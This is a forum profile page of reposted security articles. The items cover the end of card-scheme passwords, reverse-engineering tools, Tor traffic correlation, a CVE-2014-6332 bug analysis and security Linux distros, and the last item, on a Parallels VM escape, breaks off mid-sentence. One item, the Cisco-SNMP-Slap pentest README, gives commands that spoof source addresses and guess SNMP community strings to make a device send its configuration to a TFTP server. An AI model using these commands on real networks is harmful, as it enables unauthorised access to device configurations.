Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. Mastercard and Visa to ERADICATE password authentication By John Leyden, 14 Nov 2014 Mastercard and Visa are removing the need for users to enter their passwords for identity confirmation as part of a revamp of the existing (oft-criticised) 3-D Secure scheme. The arrival of 3D Secure 2.0 next year will see the credit card giants moving away from the existing system of secondary static passwords to authorise online purchases, as applied by Verified by Visa and MasterCard SecureCode, towards a next-gen system based on more secure biometric and token-based prompts. Security experts welcomed the move, which some argue is if anything overdue. Initially authentication codes will be sent to pre-registered mobiles before the longer term goal of placing more emphasis on biometrics. “All of us want a payment experience that is safe as well as simple, not one or the other,” said Ajay Bhalla, president of enterprise security solutions at MasterCard, The Guardian reports. “We want to identify people for who they are, not what they remember. We have too many passwords to remember and this creates extra problems for consumers and businesses.” 3-D Secure is disliked both by security experts, who argue it's easily circumvented by phishing attacks, and merchants, who say the scheme's only benefit is allowing banks to shift liability in the case of fraudulent payments. The long-standing criticism has been that schemes like Verified by Visa inconvenience users without offering increased security. Marta Janus, a security researcher at Kaspersky Lab, welcomed the decision by the credit card giants to move away from static passwords. "It’s pretty well known that passwords are severely flawed: weak ones are easy to remember and easy to guess; strong ones are hard to guess, but hard to remember," Janus said. "So the move from Mastercard and Visa is definitely an interesting one." "It’s a really good approach and, if implemented properly, the new protocol will not only be way more convenient for users, but also much more secure. One time passwords are already widely used and considered much safer than traditional 'fixed' passwords, even if it's still possible for cybercriminals to obtain and use them. But, combined with biometric checks, this will certainly make a strong alternative to any existing authentication method," she concluded. Phil Turner, VP EMEA at enterprise-focused identity management service firm Okta, also welcomed the development as a move towards reducing the number of usernames/passwords consumers are obliged to remember. "Between their work and personal accounts, consumers have a lot of usernames and passwords to remember, each of which has different password requirements and expiration cycles," Turner explained. "Add this to the hassle caused by constant password resets and remembering secret questions and it’s clear consumers need a way to make this process easier. "The move to abolish passwords will no doubt be welcomed by customers. Today we have so many passwords to remember. As a result, most of us suffer from 'password fatigue' where we use obvious or reused passwords often written down on Post-it notes or saved in Excel files on laptops," he added. ® Sursa: Mastercard and Visa to ERADICATE password authentication • The Register
  2. IODIDE - The IOS Debugger and Integrated Disassembler Environment Released as open source by NCC Group Plc - http://www.nccgroup.com/ Developed by Andy Davis, andy dot davis at nccgroup dot com https://github.com/nccgroup/IODIDE Released under AGPL see LICENSE for more information Includes the PowerPC disassembler from cxmon by Christian Bauer, Marc Hellwig (The Official cxmon Home Page) Documentation https://github.com/nccgroup/IODIDE/wiki Pre-requisites Python wxPython pyserial Platforms Tested on Windows 7 Sursa: https://github.com/nccgroup/IODIDE
  3. IDA Skins Plugin providing advanced skinning support for the Qt version of IDA Pro utilizing Qt stylesheets, similar to CSS. Screenshot Screenshot above shows the enclosed stylesheet.css in combination with the idaConsonance theme. Binary distribution Download latest binary version from github Installation Place IDASkins.plX into the plugins directory of your IDA installation. The theme files (the skin directory) needs to be copied to the root of your IDA installation. Theming Theming IDA using IDASkins works using Qt stylesheets. For information on the most important IDA-specific UI elements, take a look in the enclosed default stylesheet.css. Sursa: https://github.com/athre0z/ida-skins
  4. Traffic Analysis Attacks and Defenses in Low Latency Anonymous Communication Sambuddho Chakravarty The recent public disclosure of mass surveillance of electronic communication, involving powerful government authorities, has drawn the public’s attention to issues regarding Internet privacy. For almost a decade now, there have been several research efforts towards designing and deploying open source, trustworthy and reliable systems that ensure users’ anonymity and privacy. These systems operate by hiding the true network identity of communicating parties against eavesdropping adversaries. Tor, acronym for The Onion Router, is an example of such a system. Such systems relay the traffic of their users through an overlay of nodes that are called Onion Routers and are operated by volunteers distributed across the globe. Such systems have served well as anti-censorship and anti-surveillance tools. However, recent publications have disclosed that powerful government organizations are seeking means to de-anonymize such systems and have deployed distributed monitoring infrastructure to aid their efforts. Attacks against anonymous communication systems, like Tor, often involve traffic analysis. In such attacks, an adversary, capable of observing network traffic statistics in several different networks, correlates the traffic patterns in these networks, and associates otherwise seemingly unrelated network connections. The process can lead an adversary to the source of an anonymous connection. However, due to their design, consisting of globally distributed relays, the users of anonymity networks like Tor, can route their traffic virtually via any network; hiding their tracks and true identities from their communication peers and eavesdropping adversaries. De-anonymization of a random anonymous connection is hard, as the adversary is required to correlate traffic patterns in one network link to those in virtually all other networks. Past research mostly involved reducing the complexity of this process by first reducing the set of relays or network routers to monitor, and then identifying the actual source of anonymous traffic among network connections that are routed via this reduced set of relays or network routers to monitor. A study of various research efforts in this field reveals that there have been many more efforts to reduce the set of relays or routers to be searched than to explore methods for actually identifying an anonymous user amidst the network connections using these routers and relays. Few have tried to comprehensively study a complete attack, that involves reducing the set of relays and routers to monitor and identifying the source of an anonymous connection. Although it is believed that systems like Tor are trivially vulnerable to traffic analysis, there are various technical challenges and issues that can become obstacles to accurately identifying the source of anonymous connection. It is hard to adjudge the vulnerability of anonymous communication systems without adequately exploring the issues involved in identifying the source of anonymous traffic. Download: http://cryptome.org/2014/11/sambuddho_thesis.pdf
  5. [h=1]Cisco-SNMP-Slap[/h] OVERVIEW ======== cisco-snmp-slap utilises IP address spoofing in order to bypass an ACL protecting an SNMP service on a Cisco IOS device. Typically IP spoofing has limited use during real attacks outside DoS. Any TCP service cannot complete the inital handshake. UDP packets are easier to spoof but the return packet is often sent to the wrong address, which makes it difficult to collect any information returned. However if an attacker can guess the snmp rw community string and a valid source address an attacker can set SNMP MiBs. One of the more obvious uses for this is to have a Cisco SNMP service send its IOS configuration file to another device. This tool allows you to try one or more community strings against a Cisco device from one or more IP addresses. When specifying IP addresses you can choose to subsequently or randomly go through a range of source addresses. To specifying range of source IP addresses to check an initial source address and IP mask are supplied. Any bits set in the IP mask will be used to generate source IP addresses by altering the initial source address. For example, if a source address of `10.0.0.0` is supplied with a IP mask of 0.0.0.255 then the script will explore the address from `10.0.0.0` to `10.0.0.255`. The bits set do not have to be sequential like a subnet mask. For example the mask 0.128.1.255 is valid and will explore the ranges `10.0,128.0-1.0-255`. When checking a range of IP addresses randomly or sequentially it requires you to enter the path to the root of the tftp directory. The script will check this directory to see if the file has been successfully transferred. This tool was written to target Cisco layer 3 switches during pentests, though it may have other users. It works well against these devices because: 1. layer 3 switches rarely have reverse path verification configured in the author's experience 2. there are no routers or other devices which may be able to detect that IP spoofing is occurring. Though I hope that users will find other interesting uses for this script and its source code. USAGE ===== In this example I will take a simple IOS device with an access list protecting a SNMP service using the community string 'cisco' access-list 10 permit 10.100.100.0 0.0.0.255 snmp-server community cisco rw 10 One IOS device's IP address is `10.0.0.1` The pentester has an IP address `10.0.0.2` and has started a TFTP server. If the tester knows all of this they use the one shot single mode to grab the device's config file. E.g. ./slap.py single cisco 10.0.0.2 10.100.100.100 10.0.0.1 If the tester doesn't know the details of they could try and guess. Lets say the tester has done some recon and has figured out that all internal addresses are the 10.0.0.0/8 range. ./slap.py seqmask private 10.0.0.2 10.0.0.0 0.255.255.0 10.0.0.1 /tftproot/ This command will search through all the /24, the tester hopes they can save some time by assuming a whole subnet will be allowed access rather than just one IP address. root@Athena:/home/notroot/cisco-snmp-slap# ./slap.py seqmask cisco 10.0.0.2 10.0.0.5 0.255.255.0 10.0.0.1 /tftproot/ Cisco SNMP Slap, v0.3 Darren McDonald, darren.mcdonald@nccgroup.com WARNING: No route found for IPv6 destination :: (no default route?) Community String: cisco TFTP Server IP : 10.0.0.2 Source IP: 10.0.0.5 Source Mask: 0.255.255.0 Destination IP: 10.0.0.1 TFTP Root Path: /tftproot//cisco-config.txt 10.0.0.5 10.0.1.5 10.0.2.5 < ... cut for brevity ... > 10.100.99.255 10.100.100.0 10.100.100.1 10.100.100.2 10.100.100.3 10.100.100.4 10.100.100.5 10.100.100.6 Success! You should notice that the program exists and announces success several IP addresses after it enters the `10.100.100.0/24` range. This because it is not possible to determine which source address was successful, but determines one of the requests was successful after the config file turns up in the tftproot. Given you've just nabbed the running config you can now find out the details of the ACL yourself. Rather than specifying a single community string you can also give a list which should be used. The mode names are the same except have a `'_l'` suffix. For example to repeat the same attack using a list of community strings in in list.txt the following arguments should be used. root@Athena:/home/notroot/cisco-snmp-slap# ./slap.py seqmask_l list.txt 10.0.0.2 10.0.0.5 0.255.255.0 10.0.0.1 /tftproot/ Cisco SNMP Slap, v0.3 Darren McDonald, darren.mcdonald@nccgroup.com WARNING: No route found for IPv6 destination :: (no default route?) Community File: list.txt TFTP Server IP : 10.0.0.2 Source IP: 10.0.0.5 Source Mask:0.255.255.0 Destination IP: 10.0.0.1 TFTP Root Path: /tftproot//cisco-config.txt community strings loaded: ['private\n', 'cisco\n', 'public\n'] 10.0.0.5 / private 10.0.0.5 / cisco 10.0.0.5 / public 10.0.1.5 / private 10.0.1.5 / cisco 10.0.1.5 / public 10.0.2.5 / private 10.0.2.5 / cisco 10.0.2.5 / public 10.0.3.5 / private 10.0.3.5 / cisco 10.0.3.5 / public Now each IP address is checked with each community string in list.txt. SUPPORT ======= As programming languages go Python is a simple language, easy to read and write and I encourage you to attempt to debug and correct any issues you find and send me your changes so I can share them with other users on the NCC Github. But if you need assistance you can contact me at darren.mcdonald@nccgroup.com. I'll do my best to help you but you should be aware I am not a full time developer (which should be obvious from my code!) and may not immediately have time get to your query. VERSIONS ======== * 0.1 Inital version * 0.2 Added random and sequental modes and source address masks * 0.3 added community string file list feature, first public version Sursa: https://github.com/nccgroup/Cisco-SNMP-Slap
  6. Eric Lippert Dissects CVE-2014-6332, a 19 year-old Microsoft bug Share Posted by Eric, Nov 14, 2014 2 Comments Today's Coverity Security Research Lab blog post is from guest blogger Eric Lippert. [UPDATE 1: The MISSING_RESTORE checker regrettably doesn't find the defect in the code I've posted here. Its heuristics for avoiding false positives causes it to suppress reporting, ironically enough. We're working on tweaking that heuristic for an upcoming release.] It was with a bizarre combination of nostalgia and horror that I read this morning about a 19-year-old rather severe security hole in Windows. Nostalgia because every bit of the exploited code is very familiar to me: working on the portion of the VBScript engine used to exploit the defect was one of my first jobs at Microsoft back in the mid-1990s. And horror because this is really a quite serious defect that has been present probably since Windows 3.1, [Update 2: heard that Windows 3.1 is in fact not affected, so you IE 2-5 users are safe ] and definitely exploitable since Windows 95. Fortunately we have no evidence that this exploit has actually been used to do harm to users, and Microsoft has released a patch. (Part of my horror was the fear that maybe this one was my bad, but it looks like the actual bug predates my time at Microsoft. Whew!) The thirty-thousand foot view is the old familiar story. An attacker who wishes to run arbitrary code on a user's machine lures the user into browsing to a web page that contains some hostile script -- VBScript, in this case. The hostile script is running inside a "sandbox" which is supposed to ensure that it only does "safe" operations, but the script attempts to force a particular buggy code path through the underlying operating system code. If it does so successfully, it produces a corrupt data structure in memory which can then be further manipulated by the script. By cleverly controlling the contents of the corrupted data structure, the hostile script can read or write memory and execute code of their choice. Today I want to expand a bit on Robert Freeman's writeup, linked above, to describe the underlying bug in more detail, the pattern that likely produced it, better ways to write the code, and whether static analysis tools could find this bug. I'm not going to delve into the specifics of how this initially-harmless-looking bug can be exploited by attackers. What's so safe about a SAFEARRAY? Many of the data structures familiar to COM programmers today, like VARIANT, BSTR and SAFEARRAY, were created for "OLE Automation"; old-timers will of course remember that OLE stood for "object linking and embedding", the "paste this Excel spreadsheet into that Word document" feature. OLE Automation was the engine that enabled Word and Excel objects to be accessed programmatically by Visual Basic. (In fact the B in BSTR stands for "Basic".) Naturally, Visual Basic uses these data structures for its representations of strings and arrays. The data structure which particularly concerns us today is SAFEARRAY: typedef struct tagSAFEARRAY { USHORT cDims; // number of dimensions USHORT fFeatures; // type of elements ULONG cbElements; // byte size per element ULONG cLocks; // lock count PVOID pvData; // data buffer SAFEARRAYBOUND rgsabound[1]; // bounds, one per dimension } SAFEARRAY; typedef struct tagSAFEARRAYBOUND { ULONG cElements; // number of indices in this dimension LONG lLbound; // lowest valid index } SAFEARRAYBOUND; SAFEARRAYs are so-called because unlike an array in C or C++, a SAFEARRAY inherently knows the dimensionality of the array, the type of the data in the array, the number of bytes in the buffer, and finally, the bounds on each dimension. How multi-dimensional arrays and arrays of unusual types are handled is irrelevant to our discussion today, so let's assume that the array involved in the attack is a single-dimensional array of VARIANT. The operating system method which contained the bug was SafeArrayRedim, which takes an existing array and a new set of bounds for the least significant dimension -- though again, for our purposes, we'll assume that there is only one dimension. The function header is: HRESULT SafeArrayRedim( SAFEARRAY *psa, SAFEARRAYBOUND *psaboundNew ) Now, we do not have the source code of this method, but based on the description of the exploit we can guess that it looks something like the code below that I made up just now. Bits of code that are not particularly germane to the defect I will omit, and I'll assume that somehow the standard OLE memory allocator has been obtained. Of course there are many cases that must be considered here -- such as "what if the lock count is non zero?" -- that I am going to ignore in pursuit of understanding the relevant bug today. As you're reading the code, see if you can spot the defect: { // Omitted: verify that the arguments are valid; produce // E_INVALIDARG or other error if they are not. PVOID pResourcesToCleanUp = NULL; // We'll need this later. HRESULT hr = S_OK; // How many bytes do we need in the buffer for the original array? // and for the new array? LONG cbOriginalSize = SomehowComputeTotalSizeOfOriginalArray(psa); LONG cbNewSize = SomehowComputeTotalSizeOfNewArray(psa, psaboundNew); LONG cbDifference = cbNewSize - cbOriginalSize; if (cbDifference == 0) { goto DONE; } SAFEARRAYBOUND originalBound = psa->rgsabound[0]; psa->rgsabound[0] = *psaboundNew; // continues below ... Things are looking pretty reasonable so far. Now we get to the tricky bit. Why is it so hard to shrink an array? If the array is being made smaller, the variants that are going to be dropped on the floor might contain resources that need to be cleaned up. For example, if we have an array of 1000 variants containing strings, and we reallocate that to only 300, those 700 strings need to be freed. Or, if instead of strings they are COM objects, they need to have their reference counts decreased. But now we are faced with a serious problem. We cannot clean up the resources after the reallocation. If the reallocation succeeds then we no longer have any legal way to access the memory that we need to scan for resources to free; that memory could be shredded, or worse, it could be reallocated to another block on another thread and filled in with anything. You simply cannot touch memory after you've freed it. But we cannot clean up resources before the reallocation either, because what if the reallocation fails? It is rare for a reallocation that shrinks a block to fail. While the documentation for IMalloc::Realloc doesn't call out it can fail when shrinking (doc bug?), it doesn't rule it out either. In that case we have to return the original array, untouched, and deallocating 70% of the strings in the array is definitely not "untouched". The solution to this impass is we have to allocate a new block and copy the resources into that new block before the reallocation. After a successful reallocation we can clean up the resources; after a failed reallocation we of course do not. // ... continued from above if (cbDifference < 0) { pResourcesToCleanUp = pmalloc->Alloc(-cbDifference); if (pResourcesToCleanUp == NULL) { hr = E_OUTOFMEMORY; goto DONE; } // Omitted: memcpy the resources to pResourcesToCleanUp } PVOID pNewData = pmalloc->Realloc(psa->pvData, cbNewSize); if (pNewData == NULL) { psa->rgsabound[0] = originalBound; hr = E_OUTOFMEMORY; goto DONE; } psa->pvData = pNewData; if (cbDifference < 0) { // Omitted: clean up the resources in pResourcesToCleanUp } else { // Omitted: initialize the new array slots to zero } hr = S_OK; // Success! DONE: // Don't forget to free that extra block. if (pResourcesToCleanUp != NULL) pmalloc->Free(pResourcesToCleanUp); return hr; } Did you spot the defect? Part of the contract of this method is that when this method returns a failure code, the original array is unchanged. The contract is violated in the code path where the array is being shrunk and the allocation of pResourcesToCleanUp fails. In that case we return a failure code, but never restore the state of the bounds which were mutated earlier to the smaller values. Compare this code path to the code path where the reallocation fails, and you'll see that the restoration line is missing. In a world where there is no hostile code running on your machine, this is not a serious bug. What's the worst that can happen? In the incredibly rare case where you are shrinking an array by an amount bigger than the memory you have available in the process, you end up with a SAFEARRAY that has the wrong bounds in a program that just produced a reallocation error anyways, and any resources that were in that memory are never freed. Not a big deal. This is the world in which OLE Automation was written: a world where people did not accidentally download hostile code off the Internet and run it automatically. But in our world this bug is a serious problem! An attacker can make what used to be an incredibly rare situation -- running out of virtual address space at exactly the wrong time -- quite common by carefully controlling how much memory is allocated at any one time by the script. An attacker can cause the script engine to ignore the reallocation error and keep on processing the now-internally-inconsistent array. And once we have an inconsistent data structure in memory, the attacker can use other sophisticated techniques to take advantage of this corrupt data structure to read and write memory that they have no business reading and writing. Like I said before, I'm not going to go into the exact details of the further exploits that take advantage of this bug; today I'm interested in the bug itself. See the linked article for some thoughts on the exploit. How can we avoid this defect? How can we detect it? It is surprisingly easy to write these sorts of bugs in COM code. What can you do to avoid this problem? I wrote who knows how many thousands of lines of COM code in my early days at Microsoft, and I avoided these problems by application of a strict discipline. Among my many rules for myself were: Every method has exactly one exit point. Every local variable is initialized to a sensible value or NULL. Every non-NULL local variable is cleaned up at the exit point Conversely, if the resource is cleaned up early on a path, or if its ownership is ever transferred elsewhere, then the local is set back to NULL. Methods which modify memory locations owned by their callers do so only at the exit point, and only when the method is about to return a success code. The code which I've presented here today -- which I want to emphasize again I made up myself just now to illustrate what the original bug probably looks like -- follows some of these best practices, but not all of them. There is one exit point. Every local is initialized. One of the resources -- the pResourcesToCleanUp block -- is cleaned up correctly at the exit point. But the last rule is violated: memory owned by the caller is modified early, rather than immediately before returning success. The requirement that the developer always remember to re-mutate the caller's data in the event of an error is a bug waiting to happen, and in this case, it did happen. Clearly the code I presented today does not follow my best practices for writing good COM methods. Is there a more general pattern to this defect? A closely related defect pattern that I see quite often in C, C++, C# and Java is: someLocal = someExternal; someExternal = differentValue; DoSomethingThatDependsOnTheExternal(); //... lots of code ... if (someError) return; //... lots of code ... someExternal = someLocal; And of course the variation where the restoration of the external value is skipped because of an unhandled exception is common in C++, C# and Java. Could a static analyzer help find defects like this? Certainly; Coverity's MISSING_RESTORE analyzer finds defects of the form I've just described. (Though I have not yet had a chance to run the code I presented today through it to see what happens.) There are a lot of challenges in designing analyzers to find the defect I presented today; one is determining that in this code the missing restoration is a defect on the error path but correct on the success path. This real-world defect is a good inspiration for some avenues for further research in this area; have you seen similar defects that follow this pattern in real-world code, in any language? I'd love to see your examples; please leave a comment if you have one. Sursa: Coverity Security Research Lab
  7. Linux Security Distros Compared: Tails vs. Kali vs. Qubes Thorin Klosowski Filed to: security If you're interested in security, you've probably already heard of security-focused Linux distros like Tails, Kali, and Qubes. They're really useful for browsing anonymously, penetration testing, and tightening down your system so it's secure from would-be hackers. Here are the strengths and weaknesses of all three. It seems like every other day we hear about another hack, browser exploit, or nasty bit of malware. If you do a lot of your browsing on public Wi-Fi networks, you're a lot more susceptible to these types of hacks. A security-focused distribution of Linux can help. For most of us, the use cases here are pretty simple. If you need to use a public Wi-Fi network at a coffee shop or the library, then one of these distributions can hide your traffic from someone trying to peek in. Likewise, if you're worried about someone tracking down your location—whether it's a creepy stalker or something even worse—randomizing and anonyming your traffic keeps you safe. Obviously you don't need this all the time, but if you're checking bank statements, uploading documents onto a work server, or even just doing some shopping, it's better to be safe than sorry. All of these distributions can run in a virtual machine or from a Live CD/USB. That means you can carry them around in your pocket and boot into them when you need to without causing yourself too much trouble. Tails Provides Security Through Anonymity Tails is a live operating system built on Debian that uses Tor for all its internet traffic. Its main goal is to give you security through anonymity. With it, you can browse the web anonymously through encrypted connections. Tails protects you in a number of ways. First, since all your traffic is routed through Tor, it's incredibly difficult to track your physical location or see which sites you visit. Tails doesn't use a computer's hard disk, so nothing you do is saved to the computer you're running it on. Instead, everything you're working on is stored in RAM and erased when you shut down. This means any sensitive documents you're working on are never stored permanently. Because of that, Tails is a really good operating system to use when you're on a public computer or network. Tails is also packed with a bunch of basic cryptographic tools. If you're running Tails off a USB drive, it's encrypted with LUKS. All your internet traffic is encrypted with HTTPS Everywhere, your IM conversations are encrypted with OTR, and your emails and documents are encrypted with OpenPGP. The crux of Tails is anonymity. While it has cryptographic tools in place, its main purpose is to anonymize everything you're during online. This is great for most people, but it doesn't give you the freedom to do stupid things. If you log into your Facebook account under your real name, it's still going to be obvious who you are and remaining anonymous on an online community is a lot harder than it seems. Pros: Routes all your traffic through Tor, comes with a ton of open-source software, has a "Windows Camouflage" mode to make it look more like Windows 8. Cons: Can't save files locally, slow, loading web sites through Tor takes forever. Who It's Best For: Tails is best suited for on-the-go security. If you find yourself at coffee shops or public libraries using the internet a lot, then Tails is perfect for you. Anonymity is the game, so if you're sick of everyone tracking what you're doing, Tails is great, but keep in mind that it's also pretty useless unless you use pseudonyms everywhere online. Kali Is All About Offensive Security Where Tails is about anonymity, Kali is mostly geared toward security testing. Kali is built on Debian and maintained by Offensive Security Ltd. You can run Kali off a Live CD, USB drive, or in a virtual machine. Kali's main focus is on pen testing, which means it's great for poking around for security holds in your own network, but isn't built for general use. That said, it does have a few basic packages, including Iceweasel for browsing the web and everything you need to run a secure server with SSH, FTP, and more. Likewise, Kali is packed with tools to hide your location and set up VPNs, so it's perfectly capable of keeping you anonymous. Kali has around 300 tools for testing the security of a network, so it's hard to really keep track of what's included, but the most popular thing to do with Kali is crack a Wi-Fi password. Kali's motto adheres to "a best defense is a good offense" so it's meant to help you test the security of your network as a whole, rather than just making you secure on one machine. Still, if you use Kali Linux, it won't leave anything behind on the system you're running it on, so it's pretty secure itself. Besides a Live CD, Kali can also run on a ton of ARM devices, including the Raspberry Pi, BeagleBone, several Chromebooks, and even the Galaxy Note 10.1. Pros: Everything you need to test a network is included in the distribution, it's relatively easy to use, and can be run on both a Live CD and in a virtual machine. Cons: Doesn't include too many tools for everyday use, doesn't include the cryptographic tools that Tails does. Who It's Best For: Kali is best suited for IT administrators and hobbyists looking to test their network for security holes. While it's secure itself, it doesn't have the basic daily use stuff most of us need from an operating system. Qubes Offers Security Through Isolation Qubes is desktop environment based on Fedora that's all about security through isolation. Qubes assumes that there can't be a truly secure operating system, so instead it runs everything inside of virtual machines. This ensures that if you are victim to a malicious attack, it doesn't spread to the operating system as a whole. With Qubes, you create virtual machines for each of your environments. For example, you could create a "Work" virtual machine that includes Firefox and Thunderbird, a "Shopping" virtual machine that includes just Firefox, and then whatever else you need. This way, when you're messing around in the "Shopping" virtual machine, it's isolated from your "Work" virtual machine in case something goes wrong. You can create virtual machines of Windows and Linux. You can also create disposable virtual machines for one time actions. Whatever happens within these virtual machines is isolated, but its not secured. If you run a buggy web browser, Qubes doesn't do much to stop the exploit. The architecture itself is set up to protect you as well. Your network connection automatically gets its own virtual machine and you can set up a proxy server for more security. Likewise, storage gets its own virtual machine as well, and everything on your hard drive is automatically encrypted. The major downfall with Qubes is the fact that you need to do everything manually. Setting up virtual machines secures your system as a whole, but you have to be proactive in actually using them. If you want your data to remain secure, you have to separate it from everything else. Pros: The isolation technique ensures that if you do download malware, your entire system isn't infected. Qubes works on a wide variety of hardware, and it's easy to securely share clipboard data between VMs. Cons: Qubes requires that you take action to create the VMs, so none of the security measures are foolproof. It's still totally susceptible to malware or other attacks too, but there's less of a chance that it'll infect your whole system. Who It's Best For: Qubes is best for proactive types who don't mind doing a bit of work to set up a secure environment. If you're working on something you don't want in other people's hands, writing out a bunch of personal information, or you're just handing over your computer to a friend who love clicking on malicious-looking sites, then a virtual machine's an easy way to keep things secure. Where something like Tails does everything for you out of the box, Qubes takes a bit of time to set up and get working. Qubes user manual is pretty giant so you have to be willing to spend some time learning it. The Rest: Ubuntu Privacy Remix, JonDo, and IprediaOS Tails, Kali, and Qubes certainly aren't the only security-focused operating systems around. Let's take a quick look at a few other popular options. Ubuntu Privacy Remix: As the name suggests, Ubuntu Privacy Remix is a privacy focused distribution built on Ubuntu. It's offline-only, so it's basically impossible for anyone to hack into it. The operating system is read-only so it can't be changed and you can only store data on encrypted removable media. It has a few other tricks up its sleeve, including a system to block third parties from activating your network connection and TrueCrypt encryption. JonDO: JonDo is a Live DVD based on Debian that contains proxy clients, a preconfigured browser for anonymous surfing, and a number of basic level security tools. It's similar to Tails, but is a bit more simplified and unfamiliar. IprediaOS: Like Tails, IprediaOS is all about anonymity. Instead of routing traffic through Tor, IprediaOS routes through I2P. Of course, none of these operating systems are particularly ideal for day-to-day use. When you're anonymizing your traffic, hiding it away, or isolating it from the rest of your operating system you tend to take away from system resources to slow things down. Likewise, the bandwidth costs means most of your web browsing is pretty terrible. All that said, these browsers are great when you're on public Wi-Fi, using a public computer, or when you just need to use a friend's computer that you don't want to leave your private data on. They're all secure enough to protect most of us with our general behavior, so pick whichever one is best suited for your particular needs. Photo by yyang. Sursa: Linux Security Distros Compared: Tails vs. Kali vs. Qubes
  8. Traffic correlation using netflows Posted November 14th, 2014 by arma in People are starting to ask us about a recent tech report from Sambuddho's group about how an attacker with access to many routers around the Internet could gather the netflow logs from these routers and match up Tor flows. It's great to see more research on traffic correlation attacks, especially on attacks that don't need to see the whole flow on each side. But it's also important to realize that traffic correlation attacks are not a new area. This blog post aims to give you some background to get you up to speed on the topic. First, you should read the first few paragraphs of the One cell is enough to break Tor's anonymity analysis: First, remember the basics of how Tor provides anonymity. Tor clients route their traffic over several (usually three) relays, with the goal that no single relay gets to learn both where the user is (call her Alice) and what site she's reaching (call it Bob). The Tor design doesn't try to protect against an attacker who can see or measure both traffic going into the Tor network and also traffic coming out of the Tor network. That's because if you can see both flows, some simple statistics let you decide whether they match up. Because we aim to let people browse the web, we can't afford the extra overhead and hours of additional delay that are used in high-latency mix networks like Mixmaster or Mixminion to slow this attack. That's why Tor's security is all about trying to decrease the chances that an adversary will end up in the right positions to see the traffic flows. The way we generally explain it is that Tor tries to protect against traffic analysis, where an attacker tries to learn whom to investigate, but Tor can't protect against traffic confirmation (also known as end-to-end correlation), where an attacker tries to confirm a hypothesis by monitoring the right locations in the network and then doing the math. And the math is really effective. There are simple packet counting attacks (Passive Attack Analysis for Connection-Based Anonymity Systems) and moving window averages (Timing Attacks in Low-Latency Mix-Based Systems), but the more recent stuff is downright scary, like Steven Murdoch's PET 2007 paper about achieving high confidence in a correlation attack despite seeing only 1 in 2000 packets on each side (Sampled Traffic Analysis by Internet-Exchange-Level Adversaries). Second, there's some further discussion about the efficacy of traffic correlation attacks at scale in the Improving Tor's anonymity by changing guard parameters analysis: Tariq's paper makes two simplifying assumptions when calling an attack successful [...] 2) He assumes that the end-to-end correlation attack (matching up the incoming flow to the outgoing flow) is instantaneous and perfect. [...] The second one ("how successful is the correlation attack at scale?" or maybe better, "how do the false positives in the correlation attack compare to the false negatives?") remains an open research question. Researchers generally agree that given a handful of traffic flows, it's easy to match them up. But what about the millions of traffic flows we have now? What levels of false positives (algorithm says "match!" when it's wrong) are acceptable to this attacker? Are there some simple, not too burdensome, tricks we can do to drive up the false positives rates, even if we all agree that those tricks wouldn't work in the "just looking at a handful of flows" case? More precisely, it's possible that correlation attacks don't scale well because as the number of Tor clients grows, the chance that the exit stream actually came from a different Tor client (not the one you're watching) grows. So the confidence in your match needs to grow along with that or your false positive rate will explode. The people who say that correlation attacks don't scale use phrases like "say your correlation attack is 99.9% accurate" when arguing it. The folks who think it does scale use phrases like "I can easily make my correlation attack arbitrarily accurate." My hope is that the reality is somewhere in between — correlation attacks in the current Tor network can probably be made plenty accurate, but perhaps with some simple design changes we can improve the situation. The discussion of false positives is key to this new paper too: Sambuddho's paper mentions a false positive rate of 6%. That sounds like it means if you see a traffic flow at one side of the Tor network, and you have a set of 100000 flows on the other side and you're trying to find the match, then 6000 of those flows will look like a match. It's easy to see how at scale, this "base rate fallacy" problem could make the attack effectively useless. And that high false positive rate is not at all surprising, since he is trying to capture only a summary of the flows at each side and then do the correlation using only those summaries. It would be neat (in a theoretical sense) to learn that it works, but it seems to me that there's a lot of work left here in showing that it would work in practice. It also seems likely that his definition of false positive rate and my use of it above don't line up completely: it would be great if somebody here could work on reconciling them. For a possibly related case where a series of academic research papers misunderstood the base rate fallacy and came to bad conclusions, see Mike's critique of website fingerprinting attacks plus the follow-up paper from CCS this year confirming that he's right. I should also emphasize that whether this attack can be performed at all has to do with how much of the Internet the adversary is able to measure or control. This diversity question is a large and important one, with lots of attention already. See more discussion here. In summary, it's great to see more research on traffic confirmation attacks, but a) traffic confirmation attacks are not a new area so don't freak out without actually reading the papers, and this particular one, while kind of neat, doesn't supercede all the previous papers. (I should put in an addendum here for the people who are wondering if everything they read on the Internet in a given week is surely all tied together: we don't have any reason to think that this attack, or one like it, is related to the recent arrests of a few dozen people around the world. So far, all indications are that those arrests are best explained by bad opsec for a few of them, and then those few pointed to the others when they were questioned.) Sursa: https://blog.torproject.org/blog/traffic-correlation-using-netflows
  9. Simple guest to host VM escape for Parallels Desktop First post in this blog that written in english, please be patient with my awful language skills. This is a little story about exploiting guest to host VM escape not-a-vulnerability in Parallels Desktop 10 for Mac. Discovered attack is not about some serious hardcore stuff like hypervisor bugs or low-level vulnerabilities in guest-host communication interfaces, it can be easily performed even by very lame Windows malware if your virtual machine has insecure settings. Discovering It always was obvious to me, that rich features for communicating with the guest operating systems (almost any modern desktop virtualisation software has them) might be dangerous. Recently I finally decided to check, how exactly they can be dangerous on example of the virtualisation software that I'm using on OS X (and millions of other users too). It's a nice product and I think that currently it has a much less attention of security researchers than it actually deserving. Parallels Desktop 10 virtual machines has a lot of user-friendly capabilities for making guest operating system highly integrated with the host, and most of such options are enabled by default. Let's talk about one of them: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Parallels Desktop 10 VM options[/TD] [/TR] [/TABLE] There is "Access Windows folder from Mac" option that looks pretty innocent (please note, that all other sharing options are off). This option is enabled by default for all of the virtual machines as well, and here is the description of this option from Parallels Desktop 10 for Mac User's Guide: Access a Windows Folder or File from a Mac OS X Application By default, you can navigate to all your Windows folders and files from Mac OS X. Windows disks are mounted to /Volumes. At the same time, Windows appears as a hard disk mounted on the Mac OS X desktop. Note: The Windows disk disappears from the desktop and the Finder, but you can still access all of the Windows files and folders via the Windows PVM file and Terminal (/Volumes). By default, the PVM file is either in /Users/<Username>/Documents/Parallels/ or /Users/Shared. You can also find the PVM file by right-clicking Windows in Parallels Desktop Control Center (or in the virtual machine window when Windows is shut down) and selecting Show in Finder. To access Windows files and folders, right-click the PVM file, select Show Package Contents from the context menu, and open the Windows Disks folder. To disable the ability to navigate to Windows files and folders, deselect Access Windows folders from Mac in step 3 above. Well, just a guest 